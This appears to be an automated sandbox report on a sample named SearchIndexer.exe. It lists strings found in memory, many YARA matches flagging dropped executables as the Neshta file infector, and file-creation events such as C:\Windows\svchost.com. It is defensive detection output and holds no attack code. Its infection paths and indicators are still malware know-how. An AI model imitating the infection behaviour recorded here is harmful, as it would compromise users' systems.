Source: svchost.exe, 00000039.00000003.2223535604.000001F8488A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000039.00000003.2223535604.000001F8488C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000023.00000002.2406346739.0000023FC8DD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: msedge_pwa_launcher.exe.0.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: msedge_pwa_launcher.exe.0.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: powershell.exe, 00000014.00000002.2496719143.00000215B51E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: integrator.exe.0.dr	String found in binary or memory: https://nexus.officeapps.live.comhttps://nexusrules.officeapps.live.com
Source: svchost.exe, 00000039.00000003.2223535604.000001F8488C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000039.00000003.2223535604.000001F848872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: integrator.exe.0.dr	String found in binary or memory: https://otelrules.azureedge.net/rules/.bundlesdxhelper.exeFailed

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe

Window created: window name: CLIPBRDWNDCLASS

Source: integrator.exe.0.dr

Binary or memory string: RegisterRawInputDevices

memstr_853a0c6b-7

System Summary

Malicious sample detected (through community Yara rule)

Source: SearchIndexer.exe, type: SAMPLE	Matched rule: Detects Neshta Author: ditekSHen
Source: 0.0.SearchIndexer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Windows\svchost.com, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Windows\svchost.com, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Windows\svchost.com, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen
Source: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe, type: DROPPED	Matched rule: Detects Neshta Author: ditekSHen

Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Windows\svchost.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Windows\Provisioning\Packages\9a52da74613a33	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC8B0546412F3A4425A5D7AA169F4D63A4.TMP	Jump to behavior
